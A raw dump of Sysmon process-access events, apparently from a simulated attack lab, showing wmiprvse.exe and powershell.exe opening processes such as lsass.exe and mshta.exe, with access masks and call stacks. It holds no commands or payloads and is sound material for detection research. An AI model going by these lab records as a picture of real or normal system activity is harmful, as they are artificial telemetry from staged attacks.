10341000x80000000000000001697086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.973{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.960{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc164f3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf3c98(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a54cd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a54db(wow64) 10341000x80000000000000001697083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.960{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3b24|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc164f3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf3c98(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a54cd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64) 10341000x80000000000000001697082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7073-603D-5E88-00000000AD01}2712C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7073-603D-5D88-00000000AD01}3268C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.927{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 